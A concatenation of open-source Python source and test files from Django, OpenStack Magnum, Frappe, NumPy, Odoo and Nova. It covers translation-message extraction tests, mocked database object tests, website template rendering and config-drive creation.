self.assertIn('msgctxt "Special blocktrans context #3"', po_contents)
self.assertMsgId("Translatable literal #8c-singular", po_contents)
self.assertIn("Translatable literal #8c-plural", po_contents)
self.assertIn('msgctxt "Special blocktrans context #4"', po_contents)
self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
def test_context_in_single_quotes(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertIn('msgctxt "Context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Context wrapped in single quotes"', po_contents)
# {% blocktrans %}
self.assertIn('msgctxt "Special blocktrans context wrapped in double quotes"', po_contents)
self.assertIn('msgctxt "Special blocktrans context wrapped in single quotes"', po_contents)
def test_template_comments(self):
"""Template comment tags on the same line of other constructs (#19552)"""
os.chdir(self.test_dir)
# Test detection/end user reporting of old, incorrect templates
# translator comments syntax
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter('always')
management.call_command('makemessages', locale=[LOCALE], extensions=['thtml'], verbosity=0)
self.assertEqual(len(ws), 3)
for w in ws:
self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
six.assertRegex(
self, str(ws[0].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #1' \(file templates[/\\]comments.thtml, line 4\) "
r"was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[1].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #3' \(file templates[/\\]comments.thtml, line 6\) "
r"was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(
self, str(ws[2].message),
r"The translator-targeted comment 'Translators: ignored i18n "
r"comment #4' \(file templates[/\\]comments.thtml, line 8\) "
"was ignored, because it wasn't the last item on the line\."
)
# Now test .po file contents
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Translatable literal #9a', po_contents)
self.assertNotIn('ignored comment #1', po_contents)
self.assertNotIn('Translators: ignored i18n comment #1', po_contents)
self.assertMsgId("Translatable literal #9b", po_contents)
self.assertNotIn('ignored i18n comment #2', po_contents)
self.assertNotIn('ignored comment #2', po_contents)
self.assertMsgId('Translatable literal #9c', po_contents)
self.assertNotIn('ignored comment #3', po_contents)
self.assertNotIn('ignored i18n comment #3', po_contents)
self.assertMsgId('Translatable literal #9d', po_contents)
self.assertNotIn('ignored comment #4', po_contents)
self.assertMsgId('Translatable literal #9e', po_contents)
self.assertNotIn('ignored comment #5', po_contents)
self.assertNotIn('ignored i18n comment #4', po_contents)
self.assertMsgId('Translatable literal #9f', po_contents)
self.assertIn('#. Translators: valid i18n comment #5', po_contents)
self.assertMsgId('Translatable literal #9g', po_contents)
self.assertIn('#. Translators: valid i18n comment #6', po_contents)
self.assertMsgId('Translatable literal #9h', po_contents)
self.assertIn('#. Translators: valid i18n comment #7', po_contents)
self.assertMsgId('Translatable literal #9i', po_contents)
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
self.assertMsgId("Translatable literal #9j", po_contents)
def test_makemessages_find_files(self):
"""
Test that find_files only discover files having the proper extensions.
"""
cmd = MakeMessagesCommand()
cmd.ignore_patterns = ['CVS', '.*', '*~', '*.pyc']
cmd.symlinks = False
cmd.domain = 'django'
cmd.extensions = ['html', 'txt', 'py']
cmd.verbosity = 0
cmd.locale_paths = []
cmd.default_locale_path = os.path.join(self.test_dir, 'locale')
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.py', '.html', '.txt'}), set())
cmd.extensions = ['js']
cmd.domain = 'djangojs'
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.js'}), set())
@mock.patch('django.core.management.commands.makemessages.popen_wrapper')
def test_makemessages_gettext_version(self, mocked_popen_wrapper):
# "Normal" output:
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.18.1\n"
"Copyright (C) 1995-1998, 2000-2010 Free Software Foundation, Inc.\n"
"License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
"This is free software: you are free to change and redistribute it.\n"
"There is NO WARRANTY, to the extent permitted by law.\n"
"Written by Ulrich Drepper.\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 18, 1))
# Version number with only 2 parts (#23788)
mocked_popen_wrapper.return_value = (
"xgettext (GNU gettext-tools) 0.17\n", '', 0)
cmd = MakeMessagesCommand()
self.assertEqual(cmd.gettext_version, (0, 17))
# Bad version output
mocked_popen_wrapper.return_value = (
"any other return value\n", '', 0)
cmd = MakeMessagesCommand()
with six.assertRaisesRegex(self, CommandError, "Unable to get gettext version. Is it installed?"):
cmd.gettext_version
def test_po_file_encoding_when_updating(self):
"""Update of PO file doesn't corrupt it with non-UTF-8 encoding on Python3+Windows (#23271)"""
BR_PO_BASE = 'locale/pt_BR/LC_MESSAGES/django'
os.chdir(self.test_dir)
shutil.copyfile(BR_PO_BASE + '.pristine', BR_PO_BASE + '.po')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'locale', 'pt_BR', 'LC_MESSAGES', 'django.po'))
management.call_command('makemessages', locale=['pt_BR'], verbosity=0)
self.assertTrue(os.path.exists(BR_PO_BASE + '.po'))
with io.open(BR_PO_BASE + '.po', 'r', encoding='utf-8') as fp:
po_contents = force_text(fp.read())
self.assertMsgStr("Größe", po_contents)
class JavascriptExtractorTests(ExtractorTests):
PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
def test_javascript_literals(self):
os.chdir(self.test_dir)
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId('This literal should be included.', po_contents)
self.assertMsgId('gettext_noop should, too.', po_contents)
self.assertMsgId('This one as well.', po_contents)
self.assertMsgId(r'He said, \"hello\".', po_contents)
self.assertMsgId("okkkk", po_contents)
self.assertMsgId("TEXT", po_contents)
self.assertMsgId("It's at http://example.com", po_contents)
self.assertMsgId("String", po_contents)
self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
self.assertMsgId("foo", po_contents)
self.assertMsgId("bar", po_contents)
self.assertMsgId("baz", po_contents)
self.assertMsgId("quz", po_contents)
self.assertMsgId("foobar", po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
"""
Regression test for #23583.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
self.assertNotMsgId("Content from STATIC_ROOT should not be included", po_contents)
@override_settings(STATIC_ROOT=None, MEDIA_ROOT='')
def test_default_root_settings(self):
"""
Regression test for #23717.
"""
_, po_contents = self._run_makemessages(domain='djangojs')
self.assertMsgId("Static content inside app should be included.", po_contents)
class IgnoredExtractorTests(ExtractorTests):
def test_ignore_directory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
os.path.join('ignore_dir', '*'),
])
self.assertIn("ignoring directory ignore_dir", out)
self.assertMsgId('This literal should be included.', po_contents)
self.assertNotMsgId('This should be ignored.', po_contents)
def test_ignore_subdirectory(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'templates/*/ignore.html',
'templates/subdir/*',
])
self.assertIn("ignoring directory subdir", out)
self.assertNotMsgId('This subdir should be ignored too.', po_contents)
def test_ignore_file_patterns(self):
out, po_contents = self._run_makemessages(ignore_patterns=[
'xxx_*',
])
self.assertIn("ignoring file xxx_ignored.html", out)
self.assertNotMsgId('This should be ignored too.', po_contents)
@override_settings(
STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
def test_media_static_dirs_ignored(self):
out, _ = self._run_makemessages()
self.assertIn("ignoring directory static", out)
self.assertIn("ignoring directory media_root", out)
class SymlinkExtractorTests(ExtractorTests):
def setUp(self):
super(SymlinkExtractorTests, self).setUp()
self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
def tearDown(self):
super(SymlinkExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.remove(self.symlinked_dir)
except OSError:
pass
os.chdir(self._cwd)
def test_symlink(self):
# On Python < 3.2 os.symlink() exists only on Unix
if hasattr(os, 'symlink'):
if os.path.exists(self.symlinked_dir):
self.assertTrue(os.path.islink(self.symlinked_dir))
else:
# On Python >= 3.2) os.symlink() exists always but then can
# fail at runtime when user hasn't the needed permissions on
# Windows versions that support symbolink links (>= 6/Vista).
# See Python issue 9333 (http://bugs.python.org/issue9333).
# Skip the test in that case
try:
os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
except (OSError, NotImplementedError):
raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, symlinks=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should be included.', po_contents)
self.assertIn('templates_symlinked/test.html', po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
def tearDown(self):
super(CopyPluralFormsExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
self._rmrf('locale/es')
except OSError:
pass
os.chdir(self._cwd)
def test_copy_plural_forms(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertIn('Plural-Forms: nplurals=2; plural=(n != 1)', po_contents)
def test_override_plural_forms(self):
"""Ticket #20311."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['es'], extensions=['djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_ES))
with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
self.assertEqual(1, len(found))
def test_trans_and_plural_blocktrans_collision(self):
"""
Ensures a correct workaround for the gettext bug when handling a literal
found inside a {% trans %} tag and also in another file inside a
{% blocktrans %} with a plural (#17375).
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], extensions=['html', 'djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertNotIn("#-#-#-#-# django.pot (PACKAGE VERSION) #-#-#-#-#\\n", po_contents)
self.assertMsgId('First `trans`, then `blocktrans` with a plural', po_contents)
self.assertMsgIdPlural('Plural for a `trans` and `blocktrans` collision case', po_contents)
class NoWrapExtractorTests(ExtractorTests):
def test_no_wrap_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId(
'This literal should also be included wrapped or not wrapped '
'depending on the use of the --no-wrap option.',
po_contents
)
def test_no_wrap_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId(
'""\n"This literal should also be included wrapped or not '
'wrapped depending on the "\n"use of the --no-wrap option."',
po_contents,
use_quotes=False
)
class LocationCommentsTests(ExtractorTests):
def test_no_location_enabled(self):
"""Behavior is correct if --no-location switch is specified. See #16903."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=True)
self.assertTrue(os.path.exists(self.PO_FILE))
self.assertLocationCommentNotPresent(self.PO_FILE, 55, 'templates', 'test.html.py')
def test_no_location_disabled(self):
"""Behavior is correct if --no-location switch isn't specified."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=False)
self.assertTrue(os.path.exists(self.PO_FILE))
# #16903 -- Standard comment with source file relative path should be present
self.assertLocationCommentPresent(self.PO_FILE, 'Translatable literal #6b', 'templates', 'test.html')
# #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
self.assertLocationCommentNotPresent(self.PO_FILE, None, 'templates', 'test.html.py')
class KeepPotFileExtractorTests(ExtractorTests):
POT_FILE = 'locale/django.pot'
def tearDown(self):
super(KeepPotFileExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.unlink(self.POT_FILE)
except OSError:
pass
os.chdir(self._cwd)
def test_keep_pot_disabled_by_default(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_explicitly_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=False)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=True)
self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
LOCALES = ['pt', 'de', 'ch']
def tearDown(self):
super(MultipleLocaleExtractionTests, self).tearDown()
os.chdir(self.test_dir)
for locale in self.LOCALES:
try:
self._rmrf('locale/%s' % locale)
except OSError:
pass
os.chdir(self._cwd)
def test_multiple_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
class ExcludedLocaleExtractionTests(ExtractorTests):
LOCALES = ['en', 'fr', 'it']
PO_FILE = 'locale/%s/LC_MESSAGES/django.po'
test_dir = os.path.abspath(os.path.join(this_directory, 'exclude'))
def _set_times_for_all_po_files(self):
"""
Set access and modification times to the Unix epoch time for all the .po files.
"""
for locale in self.LOCALES:
os.utime(self.PO_FILE % locale, (0, 0))
def setUp(self):
super(ExcludedLocaleExtractionTests, self).setUp()
os.chdir(self.test_dir) # ExtractorTests.tearDown() takes care of restoring.
shutil.copytree('canned_locale', 'locale')
self._set_times_for_all_po_files()
self.addCleanup(self._rmrf, os.path.join(self.test_dir, 'locale'))
def test_command_help(self):
with captured_stdout(), captured_stderr():
# `call_command` bypasses the parser; by calling
# `execute_from_command_line` with the help subcommand we
# ensure that there are no issues with the parser itself.
execute_from_command_line(['django-admin', 'help', 'makemessages'])
def test_one_locale_excluded(self):
management.call_command('makemessages', exclude=['it'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded(self):
management.call_command('makemessages', exclude=['it', 'fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_one_locale_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr'], exclude=['fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr', 'it'], exclude=['fr', 'it'],
stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
class CustomLayoutExtractionTests(ExtractorTests):
def setUp(self):
super(CustomLayoutExtractionTests, self).setUp()
self.test_dir = os.path.join(this_directory, 'project_dir')
def test_no_locale_raises(self):
os.chdir(self.test_dir)
with six.assertRaisesRegex(self, management.CommandError,
"Unable to find a locale path to store translations for file"):
management.call_command('makemessages', locale=LOCALE, verbosity=0)
@override_settings(
LOCALE_PATHS=[os.path.join(this_directory, 'project_dir', 'project_locale')],
)
def test_project_locale_paths(self):
"""
Test that:
* translations for an app containing a locale folder are stored in that folder
* translations outside of that app are in LOCALE_PATHS[0]
"""
os.chdir(self.test_dir)
self.addCleanup(shutil.rmtree,
os.path.join(settings.LOCALE_PATHS[0], LOCALE), True)
self.addCleanup(shutil.rmtree,
os.path.join(self.test_dir, 'app_with_locale', 'locale', LOCALE), True)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
project_de_locale = os.path.join(
self.test_dir, 'project_locale', 'de', 'LC_MESSAGES', 'django.po')
app_de_locale = os.path.join(
self.test_dir, 'app_with_locale', 'locale', 'de', 'LC_MESSAGES', 'django.po')
self.assertTrue(os.path.exists(project_de_locale))
self.assertTrue(os.path.exists(app_de_locale))
with open(project_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has no locale directory', po_contents)
self.assertMsgId('This is a project-level string', po_contents)
with open(app_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has a locale directory', po_contents)
|
Alzon/SUR | refs/heads/SURmagnum | magnum/tests/unit/objects/test_container.py | 15 | # Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from testtools.matchers import HasLength
from magnum.common import utils as magnum_utils
from magnum import objects
from magnum.tests.unit.db import base
from magnum.tests.unit.db import utils
class TestContainerObject(base.DbTestCase):
def setUp(self):
super(TestContainerObject, self).setUp()
self.fake_container = utils.get_test_container()
def test_get_by_id(self):
container_id = self.fake_container['id']
with mock.patch.object(self.dbapi, 'get_container_by_id',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_id(self.context,
container_id)
mock_get_container.assert_called_once_with(self.context,
container_id)
self.assertEqual(self.context, container._context)
def test_get_by_uuid(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_uuid(self.context, uuid)
mock_get_container.assert_called_once_with(self.context, uuid)
self.assertEqual(self.context, container._context)
def test_get_by_name(self):
name = self.fake_container['name']
with mock.patch.object(self.dbapi, 'get_container_by_name',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_name(self.context, name)
mock_get_container.assert_called_once_with(self.context, name)
self.assertEqual(self.context, container._context)
def test_list(self):
with mock.patch.object(self.dbapi, 'get_container_list',
autospec=True) as mock_get_list:
mock_get_list.return_value = [self.fake_container]
containers = objects.Container.list(self.context)
self.assertEqual(mock_get_list.call_count, 1)
self.assertThat(containers, HasLength(1))
self.assertIsInstance(containers[0], objects.Container)
self.assertEqual(self.context, containers[0]._context)
def test_create(self):
with mock.patch.object(self.dbapi, 'create_container',
autospec=True) as mock_create_container:
mock_create_container.return_value = self.fake_container
container = objects.Container(self.context, **self.fake_container)
container.create()
mock_create_container.assert_called_once_with(self.fake_container)
self.assertEqual(self.context, container._context)
def test_destroy(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
with mock.patch.object(self.dbapi, 'destroy_container',
autospec=True) as mock_destroy_container:
container = objects.Container.get_by_uuid(self.context, uuid)
container.destroy()
mock_get_container.assert_called_once_with(self.context, uuid)
mock_destroy_container.assert_called_once_with(uuid)
self.assertEqual(self.context, container._context)
def test_save(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
with mock.patch.object(self.dbapi, 'update_container',
autospec=True) as mock_update_container:
container = objects.Container.get_by_uuid(self.context, uuid)
container.image = 'container.img'
container.save()
mock_get_container.assert_called_once_with(self.context, uuid)
mock_update_container.assert_called_once_with(
uuid, {'image': 'container.img'})
self.assertEqual(self.context, container._context)
def test_refresh(self):
uuid = self.fake_container['uuid']
new_uuid = magnum_utils.generate_uuid()
returns = [dict(self.fake_container, uuid=uuid),
dict(self.fake_container, uuid=new_uuid)]
expected = [mock.call(self.context, uuid),
mock.call(self.context, uuid)]
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
side_effect=returns,
autospec=True) as mock_get_container:
container = objects.Container.get_by_uuid(self.context, uuid)
self.assertEqual(uuid, container.uuid)
container.refresh()
self.assertEqual(new_uuid, container.uuid)
self.assertEqual(expected, mock_get_container.call_args_list)
self.assertEqual(self.context, container._context)
|
indictranstech/trufil-frappe | refs/heads/develop | frappe/website/template.py | 3 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import get_full_index
from frappe import _
from jinja2.utils import concat
from jinja2 import meta
import re
def build_template(context):
"""Returns a dict of block name and its rendered content"""
out = {}
render_blocks(context["template"], out, context)
# set_sidebar(out, context)
set_breadcrumbs(out, context)
set_title_and_header(out, context)
# meta
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
add_index(out, context)
# render
content_context = {}
content_context.update(context)
content_context.update(out)
out["content"] = frappe.get_template("templates/includes/page_content.html").render(content_context)
separate_style_and_script(out, context)
add_hero(out, context)
return out
def render_blocks(template_path, out, context):
"""Build the template block by block from the main template."""
env = frappe.get_jenv()
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
render_blocks(referenced_template_path, out, context)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
new_context = template.new_context(context)
out[block] = concat(render(new_context))
def separate_style_and_script(out, context):
"""Extract `style` and `script` tags into separate blocks"""
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
def set_breadcrumbs(out, context):
"""Build breadcrumbs template (deprecated)"""
out["no_breadcrumbs"] = context.get("no_breadcrumbs", 0) \
or ("<!-- no-breadcrumbs -->" in out.get("content", ""))
if out["no_breadcrumbs"]:
out["breadcrumbs"] = ""
elif "breadcrumbs" not in out:
out["breadcrumbs"] = frappe.get_template("templates/includes/breadcrumbs.html").render(context)
def set_title_and_header(out, context):
"""Extract and set title and header from content or context."""
out["no_header"] = context.get("no_header", 0) or ("<!-- no-header -->" in out.get("content", ""))
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "title" not in out:
out["title"] = context.get("title")
if context.get("page_titles") and context.page_titles.get(context.pathname):
out["title"] = context.page_titles.get(context.pathname)[0]
# header
if out["no_header"]:
out["header"] = ""
else:
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if not out.get("header") and "<h1" not in out.get("content", ""):
if out.get("title"):
out["header"] = out["title"]
if out.get("header") and not re.findall("<h.>", out["header"]):
out["header"] = "<h1>" + out["header"] + "</h1>"
if not out.get("header"):
out["no_header"] = 1
out["title"] = strip_html(out.get("title") or "")
def set_sidebar(out, context):
"""Include sidebar (deprecated)"""
out["has_sidebar"] = not (context.get("no_sidebar", 0) or ("<!-- no-sidebar -->" in out.get("content", "")))
if out.get("has_sidebar"):
out["sidebar"] = frappe.get_template("templates/includes/sidebar.html").render(context)
def add_index(out, context):
"""Add index, next button if `{index}`, `{next}` is present."""
# table of contents
extn = ""
if context.page_links_with_extn:
extn = ".html"
if "{index}" in out.get("content", "") and context.get("children") and len(context.children):
full_index = get_full_index(context.pathname, extn = extn)
if full_index:
html = frappe.get_template("templates/includes/full_index.html").render({
"full_index": full_index,
"url_prefix": context.url_prefix
})
out["content"] = out["content"].replace("{index}", html)
# next and previous
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
next_item.extn = "" if context.doc.has_children(next_item.name) else extn
if context.relative_links:
next_item.name = next_item.page_name or ""
else:
if next_item and next_item.name and next_item.name[0]!="/":
next_item.name = "/" + next_item.name
if next_item and next_item.name:
if not next_item.title:
next_item.title = ""
html = ('<p class="btn-next-wrapper"><a class="btn-next" href="{name}{extn}">'\
+_("Next")+': {title}</a></p>').format(**next_item)
else:
html = ""
out["content"] = out["content"].replace("{next}", html)
def add_hero(out, context):
"""Add a hero element if specified in content or hooks.
Hero elements get full page width."""
out["hero"] = ""
if "<!-- start-hero -->" in out["content"]:
parts1 = out["content"].split("<!-- start-hero -->")
parts2 = parts1[1].split("<!-- end-hero -->")
out["content"] = parts1[0] + parts2[1]
out["hero"] = parts2[0]
elif context.hero and context.hero.get(context.pathname):
out["hero"] = frappe.render_template(context.hero[context.pathname][0], context)
|
kirillzhuravlev/numpy | refs/heads/master | numpy/distutils/tests/swig_ext/setup.py | 135 | #!/usr/bin/env python
from __future__ import division, print_function
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('swig_ext', parent_package, top_path)
config.add_extension('_example',
['src/example.i', 'src/example.c']
)
config.add_extension('_example2',
['src/zoo.i', 'src/zoo.cc'],
depends=['src/zoo.h'],
include_dirs=['src']
)
config.add_data_dir('tests')
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(configuration=configuration)
|
xq262144/hue | refs/heads/master | desktop/core/ext-py/Django-1.6.10/tests/user_commands/management/commands/leave_locale_alone_true.py | 67 | from django.core.management.base import BaseCommand
from django.utils import translation
class Command(BaseCommand):
can_import_settings = True
leave_locale_alone = True
def handle(self, *args, **options):
return translation.get_language()
|
glovebx/odoo | refs/heads/8.0 | addons/website_mail/models/email_template.py | 151 | # -*- coding: utf-8 -*-
from openerp.osv import osv
from openerp.tools.translate import _
class EmailTemplate(osv.Model):
_inherit = 'email.template'
def action_edit_html(self, cr, uid, ids, context=None):
if not len(ids) == 1:
raise ValueError('One and only one ID allowed for this action')
if not context.get('params'):
action_id = self.pool['ir.model.data'].xmlid_to_res_id(cr, uid, 'mass_mailing.action_email_template_marketing')
else:
action_id = context['params']['action']
url = '/website_mail/email_designer?model=email.template&res_id=%d&return_action=%d&enable_editor=1' % (ids[0], action_id)
return {
'name': _('Edit Template'),
'type': 'ir.actions.act_url',
'url': url,
'target': 'self',
}
|
akash1808/nova_test_latest | refs/heads/master | nova/tests/unit/test_configdrive2.py | 44 | # Copyright 2012 Michael Still and Canonical Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import tempfile
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_utils import fileutils
from nova import context
from nova import test
from nova.tests.unit import fake_instance
from nova import utils
from nova.virt import configdrive
CONF = cfg.CONF
class FakeInstanceMD(object):
def metadata_for_config_drive(self):
yield ('this/is/a/path/hello', 'This is some content')
class ConfigDriveTestCase(test.NoDBTestCase):
def test_create_configdrive_iso(self):
CONF.set_override('config_drive_format', 'iso9660')
imagefile = None
try:
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('genisoimage', '-o', mox.IgnoreArg(), '-ldots',
'-allow-lowercase', '-allow-multidot', '-l',
'-publisher', mox.IgnoreArg(), '-quiet', '-J', '-r',
'-V', 'config-2', mox.IgnoreArg(), attempts=1,
run_as_root=False).AndReturn(None)
self.mox.ReplayAll()
with configdrive.ConfigDriveBuilder(FakeInstanceMD()) as c:
(fd, imagefile) = tempfile.mkstemp(prefix='cd_iso_')
os.close(fd)
c.make_drive(imagefile)
finally:
if imagefile:
fileutils.delete_if_exists(imagefile)
def test_create_configdrive_vfat(self):
CONF.set_override('config_drive_format', 'vfat')
imagefile = None
try:
self.mox.StubOutWithMock(utils, 'mkfs')
self.mox.StubOutWithMock(utils, 'execute')
self.mox.StubOutWithMock(utils, 'trycmd')
utils.mkfs('vfat', mox.IgnoreArg(),
label='config-2').AndReturn(None)
utils.trycmd('mount', '-o', mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(),
run_as_root=True).AndReturn((None, None))
utils.execute('umount', mox.IgnoreArg(),
run_as_root=True).AndReturn(None)
self.mox.ReplayAll()
with configdrive.ConfigDriveBuilder(FakeInstanceMD()) as c:
(fd, imagefile) = tempfile.mkstemp(prefix='cd_vfat_')
os.close(fd)
c.make_drive(imagefile)
# NOTE(mikal): we can't check for a VFAT output here because the
# filesystem creation stuff has been mocked out because it
# requires root permissions
finally:
if imagefile:
fileutils.delete_if_exists(imagefile)
